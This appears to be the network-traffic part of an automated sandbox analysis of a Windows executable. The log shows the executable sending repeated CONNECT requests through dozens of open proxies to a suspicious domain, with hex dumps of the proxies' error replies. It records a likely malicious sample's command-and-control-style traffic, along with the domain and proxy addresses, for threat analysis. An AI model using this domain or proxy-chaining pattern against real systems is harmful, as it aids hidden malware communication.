                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1889192.168.2.45515280.249.112.162806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.722507954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.989826918 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1890192.168.2.455138216.137.184.253806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.722655058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.058471918 CET965INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Server: Apache
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 663
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 65 72 2e 73 65 6e 61 2e 63 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1891192.168.2.45517851.38.63.124272946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.728496075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1892192.168.2.453346198.12.253.1498786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.735388041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1893192.168.2.454936142.54.228.19341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.758984089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1894192.168.2.455153114.236.93.203155996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.759464979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1895192.168.2.455186104.18.161.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.770768881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.858300924 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1896192.168.2.45516147.74.152.2988886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.771151066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.099220037 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.20.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1897192.168.2.455164139.159.176.14780906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.789043903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475259066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1898192.168.2.45515936.64.238.8210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.798445940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1899192.168.2.454998119.93.148.19180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.812571049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.696410894 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1900192.168.2.45058292.205.28.187264396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.848938942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1901192.168.2.45522945.144.30.1994436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.849191904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1902192.168.2.4551855.44.42.82108086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.849569082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1903192.168.2.45057945.173.12.14119946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.863089085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.222616911 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1904192.168.2.454683193.239.56.8480816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.867012024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1905192.168.2.455011124.105.55.176309066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.873595953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1906192.168.2.453347194.163.129.179165176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.873646975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1907192.168.2.455257211.234.125.34436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.918422937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1908192.168.2.45518427.75.148.5210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.937140942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1909192.168.2.45519545.179.231.21056786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.938570976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1910192.168.2.455053192.169.226.96433286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.993360043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475111961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866050959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681978941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.272428036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.865912914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475136042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.684084892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.928225994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1911192.168.2.455268218.145.131.1824436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.996097088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1912192.168.2.45496972.195.34.5941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.999500990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1913192.168.2.453337192.169.205.131410266812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.999540091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147062063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.240915060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1914192.168.2.455113104.37.135.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.030450106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1915192.168.2.455239164.132.163.73484446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.035231113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1916192.168.2.455197103.82.11.23341536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.039858103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1917192.168.2.455246209.14.112.810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
